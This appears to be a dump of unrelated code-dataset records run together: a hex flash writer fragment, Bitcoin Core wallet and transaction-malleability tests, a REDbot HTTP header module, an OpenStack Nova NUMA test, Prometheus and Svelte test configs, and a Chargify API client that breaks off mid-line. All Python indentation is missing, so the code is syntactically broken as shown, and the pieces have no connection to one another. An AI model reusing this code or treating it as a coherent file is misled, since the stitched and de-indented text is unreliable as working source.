print "invalid HEX line (bad record type: ", recordType, ")"
return False
def writeHexFile(self, filename):
f = open(filename, 'r')
parsed = list();
for line in f:
new = self.parseHexLine(line)
if new != False:
parsed.append(new)
pages = dict();
for line in parsed:
key = line[0] & 0xfff0
if pages.has_key(key):
if line[0] & 0x0f:
pages[key] = pages[key] + line[1]
else:
pages[key] = line[1] + pages[key]
else:
if line[0] & 0x0f:
pages[key] = line[1]
else:
pages[key] = line[1]
for key in pages:
addrStr = '"\\x' + hex(key & 0xff)[2:].rjust(2, '0') + '\\x' + hex((key & 0xff00) >> 8)[2:].rjust(2, '0') + '"'
self.regtran.commandWrite(ControlBoard.REG_ADDRESS, eval(addrStr).ljust(32, '\0'))
self.regtran.commandWrite(ControlBoard.REG_FLASH, pages[key].ljust(32, '\0'))
def readMotion(self):
return self.regtran.commandRead(ControlBoard.REG_MOTION)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there are cloned transactions with malleated scriptsigs."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class TxnMallTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
super(TxnMallTest, self).setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
# All nodes should start with 1,250 BTC:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 BTC serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 BTC for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
from redbot.message import headers
from redbot.speak import Note, categories, levels
from redbot.syntax import rfc7230
from redbot.type import AddNoteMethodType
class transfer_encoding(headers.HttpHeader):
canonical_name = "Transfer-Encoding"
description = """\
The `Transfer-Encoding` header indicates what (if any) type of transformation has been applied to
the message body.
This differs from `Content-Encoding` in that transfer-codings are a property of the message, not of
the representation; i.e., it will be removed by the next "hop", whereas content-codings are
end-to-end.
The most commonly used transfer-coding is `chunked`, which allows persistent connections to be used
without knowing the entire body's length."""
reference = "%s#header.transfer-encoding" % rfc7230.SPEC_URL
syntax = rfc7230.Transfer_Encoding
list_header = True
deprecated = False
valid_in_requests = True
valid_in_responses = True
def parse(self, field_value: str, add_note: AddNoteMethodType) -> str:
try:
coding, param_str = field_value.split(";", 1)
except ValueError:
coding, param_str = field_value, ""
coding = coding.lower()
param_dict = headers.parse_params(param_str, add_note, True)
if param_dict:
add_note(TRANSFER_CODING_PARAM)
return coding
def evaluate(self, add_note: AddNoteMethodType) -> None:
unwanted = set([c for c in self.value if c not in ["chunked", "identity"]])
if unwanted:
add_note(TRANSFER_CODING_UNWANTED, unwanted_codings=", ".join(unwanted))
if "identity" in self.value:
add_note(TRANSFER_CODING_IDENTITY)
class TRANSFER_CODING_IDENTITY(Note):
category = categories.CONNECTION
level = levels.INFO
summary = "The identity transfer-coding isn't necessary."
text = """\
HTTP defines _transfer-codings_ as a hop-by-hop encoding of the message body. The `identity`
tranfer-coding was defined as the absence of encoding; it doesn't do anything, so it's necessary.
You can remove this token to save a few bytes."""
class TRANSFER_CODING_UNWANTED(Note):
category = categories.CONNECTION
level = levels.BAD
summary = "%(response)s has unsupported transfer-coding."
text = """\
%(response)s's `Transfer-Encoding` header indicates it has transfer-codings applied, but REDbot didn't
ask for it (or them) to be.
They are: `%(unwanted_codings)s`
Normally, clients ask for the encodings they want in the `TE` request header. Using codings that
the client doesn't explicitly request can lead to interoperability problems."""
class TRANSFER_CODING_PARAM(Note):
category = categories.CONNECTION
level = levels.WARN
summary = "%(response)s had parameters on its transfer-codings."
text = """\
HTTP allows transfer-codings in the `Transfer-Encoding` header to have optional parameters, but it
doesn't define what they mean.
%(response)s has encodings with such parameters; although they're technically allowed, they may
cause interoperability problems. They should be removed."""
class TransferEncodingTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"chunked"]
expected_out = ["chunked"]
expected_err = [] # type: ignore
class TransferEncodingParamTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"chunked; foo=bar"]
expected_out = ["chunked"]
expected_err = [TRANSFER_CODING_PARAM]
class BadTransferEncodingTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"chunked=foo"]
expected_out = ["chunked=foo"]
expected_err = [headers.BAD_SYNTAX, TRANSFER_CODING_UNWANTED]
class TransferEncodingCaseTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"chUNked"]
expected_out = ["chunked"]
expected_err = [] # type: ignore
class TransferEncodingIdentityTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"identity"]
expected_out = ["identity"]
expected_err = [TRANSFER_CODING_IDENTITY]
class TransferEncodingUnwantedTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"foo"]
expected_out = ["foo"]
expected_err = [TRANSFER_CODING_UNWANTED]
class TransferEncodingMultTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"chunked", b"identity"]
expected_out = ["chunked", "identity"]
expected_err = [TRANSFER_CODING_IDENTITY]
class TransferEncodingMultUnwantedTest(headers.HeaderTest):
name = "Transfer-Encoding"
inputs = [b"chunked", b"foo", b"bar"]
expected_out = ["chunked", "foo", "bar"]
expected_err = [TRANSFER_CODING_UNWANTED]
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (C) 2015 Red Hat, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
import fixtures
from oslo_config import cfg
from oslo_log import log as logging
from nova.tests.functional.test_servers import ServersTestBase
from nova.tests.unit import fake_network
from nova.tests.unit.virt.libvirt import fake_libvirt_utils
from nova.tests.unit.virt.libvirt import fakelibvirt
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class NumaHostInfo(fakelibvirt.HostInfo):
def __init__(self, **kwargs):
super(NumaHostInfo, self).__init__(**kwargs)
self.numa_mempages_list = []
def get_numa_topology(self):
if self.numa_topology:
return self.numa_topology
topology = self._gen_numa_topology(self.cpu_nodes, self.cpu_sockets,
self.cpu_cores, self.cpu_threads,
self.kB_mem)
self.numa_topology = topology
# update number of active cpus
cpu_count = len(topology.cells) * len(topology.cells[0].cpus)
self.cpus = cpu_count - len(self.disabled_cpus_list)
return topology
def set_custom_numa_toplogy(self, topology):
self.numa_topology = topology
class NUMAServersTest(ServersTestBase):
def setUp(self):
super(NUMAServersTest, self).setUp()
# Replace libvirt with fakelibvirt
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.driver.libvirt_utils',
fake_libvirt_utils))
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.driver.libvirt',
fakelibvirt))
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.host.libvirt',
fakelibvirt))
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.guest.libvirt',
fakelibvirt))
self.useFixture(fakelibvirt.FakeLibvirtFixture())
def _setup_compute_service(self):
pass
def _setup_scheduler_service(self):
self.flags(compute_driver='nova.virt.libvirt.LibvirtDriver')
self.flags(scheduler_driver='nova.scheduler.'
'filter_scheduler.FilterScheduler')
self.flags(scheduler_default_filters=CONF.scheduler_default_filters
+ ['NUMATopologyFilter'])
return self.start_service('scheduler')
def _run_build_test(self, flavor_id, filter_mock, end_status='ACTIVE'):
self.compute = self.start_service('compute', host='test_compute0')
fake_network.set_stub_network_methods(self.stubs)
# Create server
good_server = self._build_server(flavor_id)
post = {'server': good_server}
created_server = self.api.post_server(post)
LOG.debug("created_server: %s" % created_server)
self.assertTrue(created_server['id'])
created_server_id = created_server['id']
# Validate that the server has been created
found_server = self.api.get_server(created_server_id)
self.assertEqual(created_server_id, found_server['id'])
# It should also be in the all-servers list
servers = self.api.get_servers()
server_ids = [s['id'] for s in servers]
self.assertIn(created_server_id, server_ids)
# Validate that NUMATopologyFilter has been called
self.assertTrue(filter_mock.called)
found_server = self._wait_for_state_change(found_server, 'BUILD')
self.assertEqual(end_status, found_server['status'])
self._delete_server(created_server_id)
def _get_topology_filter_spy(self):
host_manager = self.scheduler.manager.driver.host_manager
numa_filter_class = host_manager.filter_cls_map['NUMATopologyFilter']
host_pass_mock = mock.Mock(wraps=numa_filter_class().host_passes)
return host_pass_mock
@mock.patch('nova.virt.libvirt.LibvirtDriver._create_image')
def test_create_server_with_numa_topology(self, img_mock):
host_info = NumaHostInfo(cpu_nodes=2, cpu_sockets=1, cpu_cores=2,
cpu_threads=2, kB_mem=15740000)
fake_connection = fakelibvirt.Connection('qemu:///system',
version=1002007,
hv_version=2001000,
host_info=host_info)
# Create a flavor
extra_spec = {'hw:numa_nodes': '2'}
flavor_id = self._create_flavor(extra_spec=extra_spec)
host_pass_mock = self._get_topology_filter_spy()
with contextlib.nested(
mock.patch('nova.virt.libvirt.host.Host.get_connection',
return_value=fake_connection),
mock.patch('nova.scheduler.filters'
'.numa_topology_filter.NUMATopologyFilter.host_passes',
side_effect=host_pass_mock)) as (conn_mock,
filter_mock):
self._run_build_test(flavor_id, filter_mock)
@mock.patch('nova.virt.libvirt.LibvirtDriver._create_image')
def test_create_server_with_numa_fails(self, img_mock):
host_info = NumaHostInfo(cpu_nodes=1, cpu_sockets=1, cpu_cores=2,
kB_mem=15740000)
fake_connection = fakelibvirt.Connection('qemu:///system',
version=1002007,
host_info=host_info)
# Create a flavor
extra_spec = {'hw:numa_nodes': '2'}
flavor_id = self._create_flavor(extra_spec=extra_spec)
host_pass_mock = self._get_topology_filter_spy()
with contextlib.nested(
mock.patch('nova.virt.libvirt.host.Host.get_connection',
return_value=fake_connection),
mock.patch('nova.scheduler.filters'
'.numa_topology_filter.NUMATopologyFilter.host_passes',
side_effect=host_pass_mock)) as (conn_mock,
filter_mock):
self._run_build_test(flavor_id, filter_mock, end_status='ERROR')
|
unknown
|
codeparrot/codeparrot-clean
| ||
scrape_configs:
- job_name: node
scrape_protocols: ["OpenMetricsText1.0.0", "PrometheusProto", "OpenMetricsText1.0.0"]
static_configs:
- targets: ['localhost:8080']
|
unknown
|
github
|
https://github.com/prometheus/prometheus
|
config/testdata/scrape_config_files_scrape_protocols2.bad.yml
|
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0]
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 100)
# there should be 2 address groups
# each with 1 address with a balance of 50 Bitcoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 2)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 2)
assert_equal(address_group[0][1], 50)
linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
txid = node.sendmany(
fromaccount="",
amounts={common_address: 100},
subtractfeefrom=[common_address],
minconf=1,
)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
assert_equal(len(address_groups[0]), 2)
assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" account has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
node.sendfrom("", common_address, fee)
amount_to_send = 1.0
# Create accounts and make sure subsequent account API calls
# recognize the account/address associations.
accounts = [Account(name) for name in ("a", "b", "c", "d", "e")]
for account in accounts:
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
# Send a transaction to each account, and make sure this forces
# getaccountaddress to generate a new receiving address.
for account in accounts:
node.sendtoaddress(account.receive_address, amount_to_send)
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
# Check the amounts received.
node.generate(1)
for account in accounts:
assert_equal(
node.getreceivedbyaddress(account.addresses[0]), amount_to_send)
assert_equal(node.getreceivedbyaccount(account.name), amount_to_send)
# Check that sendfrom account reduces listaccounts balances.
for i, account in enumerate(accounts):
to_account = accounts[(i+1) % len(accounts)]
node.sendfrom(account.name, to_account.receive_address, amount_to_send)
node.generate(1)
for account in accounts:
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
assert_equal(node.getreceivedbyaccount(account.name), 2)
node.move(account.name, "", node.getbalance(account.name))
account.verify(node)
node.generate(101)
expected_account_balances = {"": 5200}
for account in accounts:
expected_account_balances[account.name] = 0
assert_equal(node.listaccounts(), expected_account_balances)
assert_equal(node.getbalance(""), 5200)
# Check that setaccount can assign an account to a new unused address.
for account in accounts:
address = node.getaccountaddress("")
node.setaccount(address, account.name)
account.add_address(address)
account.verify(node)
assert(address not in node.getaddressesbyaccount(""))
# Check that addmultisigaddress can assign accounts.
for account in accounts:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, account.name)
account.add_address(multisig_address)
account.verify(node)
node.sendfrom("", multisig_address, 50)
node.generate(101)
for account in accounts:
assert_equal(node.getbalance(account.name), 50)
# Check that setaccount can change the account of an address from a
# different account.
change_account(node, accounts[0].addresses[0], accounts[0], accounts[1])
# Check that setaccount can change the account of an address which
# is the receiving address of a different account.
change_account(node, accounts[0].receive_address, accounts[0], accounts[1])
# Check that setaccount can set the account of an address already
# in the account. This is a no-op.
change_account(node, accounts[2].addresses[0], accounts[2], accounts[2])
# Check that setaccount can set the account of an address which is
# already the receiving address of the account. It would probably make
# sense for this to be a no-op, but right now it resets the receiving
# address, causing getaccountaddress to return a brand new address.
change_account(node, accounts[2].receive_address, accounts[2], accounts[2])
class Account:
def __init__(self, name):
# Account name
self.name = name
# Current receiving address associated with this account.
self.receive_address = None
# List of all addresses assigned with this account
self.addresses = []
def add_address(self, address):
assert_equal(address not in self.addresses, True)
self.addresses.append(address)
def add_receive_address(self, address):
self.add_address(address)
self.receive_address = address
def verify(self, node):
if self.receive_address is not None:
assert self.receive_address in self.addresses
assert_equal(node.getaccountaddress(self.name), self.receive_address)
for address in self.addresses:
assert_equal(node.getaccount(address), self.name)
assert_equal(
set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_account(node, address, old_account, new_account):
assert_equal(address in old_account.addresses, True)
node.setaccount(address, new_account.name)
old_account.addresses.remove(address)
new_account.add_address(address)
# Calling setaccount on an address which was previously the receiving
# address of a different account should reset the receiving address of
# the old account, causing getaccountaddress to return a brand new
# address.
if address == old_account.receive_address:
new_address = node.getaccountaddress(old_account.name)
assert_equal(new_address not in old_account.addresses, True)
assert_equal(new_address not in new_account.addresses, True)
old_account.add_receive_address(new_address)
old_account.verify(node)
new_account.verify(node)
if __name__ == '__main__':
WalletAccountsTest().main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
import { test } from '../../test';
export default test({
html: `
<div>'foo'<span></span></div>
`
});
|
javascript
|
github
|
https://github.com/sveltejs/svelte
|
packages/svelte/tests/runtime-legacy/samples/html-non-entities-inside-elements/_config.js
|
# -*- coding: utf-8 -*-
'''
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
Created on Nov 20, 2009
Author: Paul Trippett (paul@pyhub.com)
'''
import httplib
import base64
import time
import datetime
import iso8601
import inspect
import logging
from itertools import chain
from xml.dom import minidom
log = logging.getLogger("pychargify")
try:
import json
except Exception, e:
try:
import simplejson as json
except Exception, e:
try:
# For AppEngine users
import django.utils.simplejson as json
except Exception, e:
log.error("No Json library found... Exiting.")
exit()
class ChargifyError(Exception):
"""
A Chargify Releated error
@license GNU General Public License
"""
pass
class ChargifyUnAuthorized(ChargifyError):
"""
Returned when API authentication has failed.
@license GNU General Public License
"""
pass
class ChargifyForbidden(ChargifyError):
"""
Returned by valid endpoints in our application that have not been
enabled for API use.
@license GNU General Public License
"""
pass
class ChargifyNotFound(ChargifyError):
"""
The requested resource was not found.
@license GNU General Public License
"""
pass
class ChargifyUnProcessableEntity(ChargifyError):
"""
Sent in response to a POST (create) or PUT (update) request
that is invalid.
@license GNU General Public License
"""
pass
class ChargifyServerError(ChargifyError):
"""
Signals some other error
@license GNU General Public License
"""
pass
class ChargifyBase(object):
"""
The ChargifyBase class provides a common base for all classes
in this module
@license GNU General Public License
"""
class Meta:
listing = None
paged = False
__ignore__ = ['api_key', 'sub_domain', 'base_host', 'request_host',
'id', '__xmlnodename__', 'Meta']
api_key = ''
sub_domain = ''
base_host = '.chargify.com'
request_host = ''
def __init__(self, apikey, subdomain):
"""
Initialize the Class with the API Key and SubDomain for Requests
to the Chargify API
"""
self.api_key = apikey
self.sub_domain = subdomain
self.request_host = self.sub_domain + self.base_host
def __get_xml_value(self, nodelist):
"""
Get the Text Value from an XML Node
"""
rc = ""
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc = rc + node.data
return rc
def __get_object_from_node(self, node, obj_type=''):
"""
Copy values from a node into a new Object
"""
if obj_type == '':
constructor = globals()[self.__name__]
else:
constructor = globals()[obj_type]
obj = constructor(self.api_key, self.sub_domain)
for childnodes in node.childNodes:
if childnodes.nodeType == 1 and not childnodes.nodeName == '':
if childnodes.nodeName in self.__attribute_types__:
obj.__setattr__(childnodes.nodeName,
self._applyS(childnodes.toxml(encoding='utf-8'),
self.__attribute_types__[childnodes.nodeName],
childnodes.nodeName))
else:
node_value = self.__get_xml_value(childnodes.childNodes)
if "type" in childnodes.attributes.keys():
node_type = childnodes.attributes["type"]
if node_value:
if node_type.nodeValue == 'datetime':
node_value = datetime.datetime.fromtimestamp(
iso8601.parse(node_value))
obj.__setattr__(childnodes.nodeName, node_value)
return obj
def fix_xml_encoding(self, xml):
"""
Chargify encodes non-ascii characters in CP1252.
Decodes and re-encodes with xml characters.
Strips out whitespace "text nodes".
"""
xml = unicode(xml, errors="ignore")
return unicode(''.join([i.strip() for i in xml.split('\n')])
.encode('utf-8', 'xmlcharrefreplace'))
def _applyS(self, xml, obj_type, node_name):
"""
Apply the values of the passed xml data to the a class
"""
dom = minidom.parseString(xml)
nodes = dom.getElementsByTagName(node_name)
if nodes.length == 1:
return self.__get_object_from_node(nodes[0], obj_type)
def _applyA(self, xml, obj_type, node_name):
"""
Apply the values of the passed data to a new class of the current type
"""
dom = minidom.parseString(xml)
nodes = dom.getElementsByTagName(node_name)
objs = []
for node in nodes:
objs.append(self.__get_object_from_node(node, obj_type))
return objs
def _toxml(self, dom):
"""
Return a XML Representation of the object
"""
log.debug("Converting element to xml....")
element = minidom.Element(self.__xmlnodename__)
for property, value in self.__dict__.iteritems():
if not property in self.__ignore__ and not inspect.isfunction(value):
if property in self.__attribute_types__:
if type(value) == list:
node = minidom.Element(property)
node.setAttribute('type', 'array')
for v in value:
child = v._toxml(dom)
if child is not None:
node.appendChild(child)
element.appendChild(node)
else:
log.debug("Adding element: %s (value: %s)" % (property, value))
try:
element.appendChild(value._toxml(dom))
log.debug("New element contents: %s", element.toprettyxml())
except:
pass
else:
node = minidom.Element(property)
node_txt = dom.createTextNode(str(value).encode('ascii', 'xmlcharrefreplace'))
node.appendChild(node_txt)
element.appendChild(node)
return element
def _get(self, url):
"""
Handle HTTP GETs to the API
"""
return self._request('GET', url)
def _post(self, url, data):
"""
Handle HTTP POST's to the API
"""
return self._request('POST', url, data)
def _put(self, url, data):
"""
Handle HTTP PUT's to the API
"""
return self._request('PUT', url, data)
def _delete(self, url, data):
"""
Handle HTTP DELETE's to the API
"""
return self._request('DELETE', url, data)
def _request(self, method, url, data=None):
"""
Handled the request and sends it to the server
"""
http = httplib.HTTPSConnection(self.request_host)
http.putrequest(method, url)
http.putheader("Authorization", "Basic %s" % self._get_auth_string())
http.putheader("User-Agent", "pychargify")
http.putheader("Host", self.request_host)
http.putheader("Accept", "application/xml")
if data:
http.putheader("Content-Length", str(len(data)))
http.putheader("Content-Type", 'text/xml; charset="UTF-8"')
http.endheaders()
log.debug('url: %s' % url)
log.debug('sending: %s' % data)
if data:
http.send(data)
response = http.getresponse()
r = response.read()
log.debug('got: %s' % r)
# Unauthorized Error
if response.status == 401:
raise ChargifyUnAuthorized()
# Forbidden Error
elif response.status == 403:
raise ChargifyForbidden()
# Not Found Error
elif response.status == 404:
raise ChargifyNotFound()
# Unprocessable Entity Error
elif response.status == 422:
print data
print r
raise ChargifyUnProcessableEntity()
# Generic Server Errors
elif response.status in [405, 500]:
log.debug('response status: %s' % response.status)
log.debug('response reason: %s' % response.reason)
raise ChargifyServerError()
return self.fix_xml_encoding(r)
def _save(self, url, node_name):
"""
Save the object using the passed URL as the API end point
"""
dom = minidom.Document()
dom.appendChild(self._toxml(dom))
request_made = {
'day': datetime.datetime.today().day,
'month': datetime.datetime.today().month,
'year': datetime.datetime.today().year
}
if self.id not in [None, 'None']:
id = str(self.id)
obj = self._applyS(self._put('/' + url + '/' + id + '.xml', dom.toxml(encoding="utf-8")), self.__name__, node_name)
if obj:
if type(obj.updated_at) == datetime.datetime:
if (obj.updated_at.day == request_made['day']) and \
(obj.updated_at.month == request_made['month']) and \
(obj.updated_at.year == request_made['year']):
self.saved = True
return (True, obj)
return (False, obj)
else:
obj = self._applyS(self._post('/' + url + '.xml',
dom.toxml(encoding="utf-8")), self.__name__, node_name)
if obj:
if type(obj.updated_at) == datetime.datetime:
if (obj.updated_at.day == request_made['day']) and \
(obj.updated_at.month == request_made['month']) and \
(obj.updated_at.year == request_made['year']):
return (True, obj)
return (False, obj)
def _get_auth_string(self):
return base64.encodestring('%s:%s' % (self.api_key, 'x'))[:-1]
def getAll(self):
if self.Meta.listing:
rv = []
do_paging = getattr(self.Meta, "paged", False)
page = 1
while True:
url = '/%s.xml' % self.Meta.listing
if do_paging:
url += '?page=%s' % page
page += 1
vals = self._applyA(self._get(url), self.__name__, self.__xmlnodename__)
rv.extend(vals)
if not do_paging or not vals: break
return rv
raise NotImplementedError('Subclass is missing Meta class attribute listing')
def getById(self, id):
if self.Meta.listing:
return self._applyS(self._get('/%s/%s.xml' % (self.Meta.listing, str(id))),
self.__name__, self.__xmlnodename__)
raise NotImplementedError('Subclass is missing Meta class attribute listing')
def __get_by_attribute__(self, key, value):
if self.Meta.listing:
return self._applyS(self._get('/%s/lookup.xml?%s=%s' %(self.Meta.listing,
str(key), str(value))), self.__name__, self.__xmlnodename__)
raise NotImplementedError('Subclass is missing Meta class attribute listing')
def save(self):
if self.Meta.listing:
return self._save(self.Meta.listing, self.__xmlnodename__)
raise NotImplementedError('Subclass is missing Meta class attribute listing')
class CompoundKeyMixin:
def getByCompoundKey(self, parent_id, sub_id):
if 'compound_key' in self.Meta.__dict__.keys():
_cb, _a = (self._applyA, ('/%s' % self.Meta.compound_key[2])) \
if len(self.Meta.compound_key) == 3 else (self._applyS, '')
return _cb(self._get('/%s.xml' % ('/'.join(['%s/%s' % i
for i in zip(self.Meta.compound_key[:2],
